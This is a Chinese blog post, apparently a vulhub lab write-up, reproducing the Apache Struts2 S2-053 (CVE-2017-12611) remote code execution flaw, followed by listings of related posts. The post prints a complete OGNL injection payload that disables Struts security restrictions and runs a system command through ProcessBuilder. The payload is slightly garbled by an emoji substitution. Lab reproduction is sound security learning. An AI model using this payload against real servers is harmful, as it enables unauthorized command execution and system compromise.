Struts2_053_RCE CVE-2017-12611 漏洞复现

最新推荐文章于 2024-09-24 16:23:16 发布
最新推荐文章于 2024-09-24 16:23:16 发布
阅读量735 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: vulhub_Writeup 文章标签: 安全漏洞 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/113864861
本文详细介绍了Struts2中一个严重的远程代码执行漏洞,该漏洞利用Freemarker模板引擎与OGNL表达式解析的交互,允许攻击者通过精心构造的payload执行任意命令。受影响的版本范围从2.0.1到2.5.10。复现过程包括使用Burp Suite抓包、修改payload并重放以触发代码执行。提供的payload成功在目标环境中执行了命令。参考链接提供了更多关于该漏洞的详细信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Struts2_053_远程代码执行

by ADummy

0x00利用路线

​ burpuite抓包—>修改payload—>重放包—>代码执行

0x01漏洞介绍

​ Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。

​ 影响版本

	2.0.1 - 2.3.33      2.5 - 2.5.10

0x02漏洞复现

payload1(RCE):

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)😦(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘id’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{’/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

访问hello.action界面

在这里插入图片描述

输入payload,发现命令成功执行

在这里插入图片描述

0x03参考资料

https://blog.csdn.net/qq_29647709/article/details/84955205

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-053CVE-2017-12611
qq_51577576的博客
12-12 841
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-053CVE-2017-12611Struts2在使用Freemarker模块引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但是由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 当开发人员在Freemarker标签中使用错误的构造时,可能会导致远程代码执行漏洞
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638)
qq_51577576的博客
11-20 1045
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638) Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。
CVE-2017-12611(【S2-053Struts2远程命令执行漏洞漏洞复现
Jerry____的博客
12-19 3674
一:漏洞描述 Struts2在使用Freemarker模块引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但是由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 二:受影响的版本 Struts 2.0.1-struts 2.3.33 Struts 2.5-Struts 2.5.10 三:环境搭建(192.168.3...
apache struts linux,Apache Struts2远程代码执行漏洞(S2-053)(CVE-2017-12611)
weixin_39888082的博客
05-14 310
Apache Struts2远程代码执行漏洞(S2-053)(CVE-2017-12611)发布日期:2017-06-23更新日期:2017-09-11受影响系统:Apache Group Struts 2.5-2.5.10Apache Group Struts 2.0.1-2.3.33描述:CVE(CAN) ID: CVE-2017-12611Struts2 是构建企业级Jave Web应用的可...
【S2-053Struts2远程命令执行漏洞CVE-2017-12611
Unitue_逆流
10-13 8363
实验环境 操作机:Windows 7IP:172.16.11.2 实验工具XAMPP: 一个功能强大的建站集成软件包 可以实现服务器的功能,但是只能自己访问 Firefox: 中文俗称‘火狐’,一个自由及开放源代码网页浏览器漏洞介绍继S2-052之后,Apache Struts 2再次被曝存在远程代码执行漏洞漏洞编号S2-053CVE编号CVE-2017-1000112。当开发人员在Fr
CVE-2017-12611 Struts2远程命令执行漏洞复现总结
qq_35622443的博客
01-11 3947
## CVE-2017-12611 Struts2-053' ### 前置知识 ``` web服务器 提供HTTP服务,传送静态页面 1、Apache Http Server(由Apache提供) 2、IIS(由Microsoft提供) 3、nginx(由NGINX,Inc。提供,发音类似于“Engine X”) 4、GWS(由谷歌提供,谷歌网络服务器的简称) 应用服务器 为应用程序提供可以调用的方法 1、WebLogic(Oracle 甲骨文公司) 2、Tomcat(Apache...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个漏洞存在于Struts2的Jakarta插件中,该插件处理HTTP请求头中的Content-Type字段时存在缺陷。攻击者可以通过精心构造的HTTP请求,...
Struts2 S2-046漏洞复现CVE-2017-5638)
1
05-27 4377
一:漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
【Vulfocus】struts2-cve_2017_9791漏洞复现
JavaLord123的博客
09-24 834
本文详细描述了Vulfocus中Struts2 S2-048 远程命令执行漏洞CVE-2017-9791)漏洞复现过程
Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现
WY92139010的博客
07-17 497
Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现 一、漏洞描述 Struts2在使用Freemarker模块引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但是由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 二、漏洞影响版本...
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,现在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
Struts2再爆远程代码执行漏洞CVE-2017-12611 S2-053 还是升级到最新版本吧
weixin_34005042的博客
09-01 418
9月5日,Struts2远程代码执行漏洞CVE-2017-9805 s2-052的事情刚搞完,7日Apache官方再出通告,又公告了一个远程代码执行漏洞CVE-2017-12611(S2-053),绿盟科技随即发布威胁预警通告,通告全文如下 Apache Struts2(S2-053)远程代码执行漏洞威胁预警通告 2017年9月7日,Apache...
struts2--CVE-2017-12611)S2-053
Lucky1youzi的博客
03-13 196
struts2--CVE-2017-12611)S2-053
本地复现Struts2-053漏洞
dmra71403的博客
05-14 761
漏洞环境:http://192.168.253.131/ exp: %{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.Actio...
【预警通告】Apache Struts2(S2-053) 远程代码执行漏洞 威胁预警通告
zzkk_的博客
09-07 1819
2017年9月7日,Apache Struts发布最新的安全公告,Apache Struts 2 存在一个远程代码执行漏洞漏洞编号为CVE-2017-12611(S2-053)。该漏洞源于在处理Freemarker标签时,如使程序员使用了不恰当的编码表达会导致远程代码执行。 相关链接如下:https://cwiki.apache.org/confluence/display/WW/S2-0
java struts漏洞_【重大漏洞预警】Struts2远程代码执行漏洞(S2-053/S2-052
weixin_36170641的博客
03-04 543
原标题:【重大漏洞预警】Struts2远程代码执行漏洞(S2-053/S2-052)Struts远程代码执行漏洞(S2-053)一、漏洞详情漏洞编号:CVE-2017-12611漏洞等级:中级受影响版本:Struts2.0.1-Struts 2.3.33 Struts 2.5- Struts 2.5.10二、漏洞描述当开发者在使用表达式文字,或在Freemarker标签(见下方)下使用强制表达式时...
mysql 1261 load data_MySQL Load data infile 和 ERROR 1261 (01000) 错误
weixin_39827589的博客
01-19 1978
今天导入数据时,发生错误1261,信息如下:ERROR 1261 (01000): Row 1 does not contain data for all columnsERROR 1262 (01000): Row 1 was truncated; it contained more data than there were input columns这个错误的原因是数据文件中的列数跟 MySQ...
1261:【例9.5】城市交通路网 (基础dp打印路径)一本通
Star77777的博客
03-16 1225
1261:【例9.5】城市交通路网 时间限制: 1000 ms 内存限制: 65536 KB 提交数: 5687 通过数: 4083 【题目描述】 下图表示城市之间的交通路网,线段上的数字表示费用,单向通行由A->E。试用动态规划的最优化原理求出A->E的最省费用。 如图:求v1到v10的最短路径长度及最短路径。 【输入】 第一行为城市的数量N; 后面是N*N的表示两个城市间费用组成的矩阵。 【输出】 A->E的最省费用。 【...
metasploit如何使用RCE-CVE-2017-7269漏洞的攻击模块
最新发布
07-01
- [^2]:讨论了复现漏洞的过程,包括在Kali中配置Metasploit和上传exp。- [^3]:提到启用msfconsole和使用Metasploit。用户的问题:请问metasploit使用CVE-2017-7269RCE漏洞攻击模块的方法所以,我需要提供一步步的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值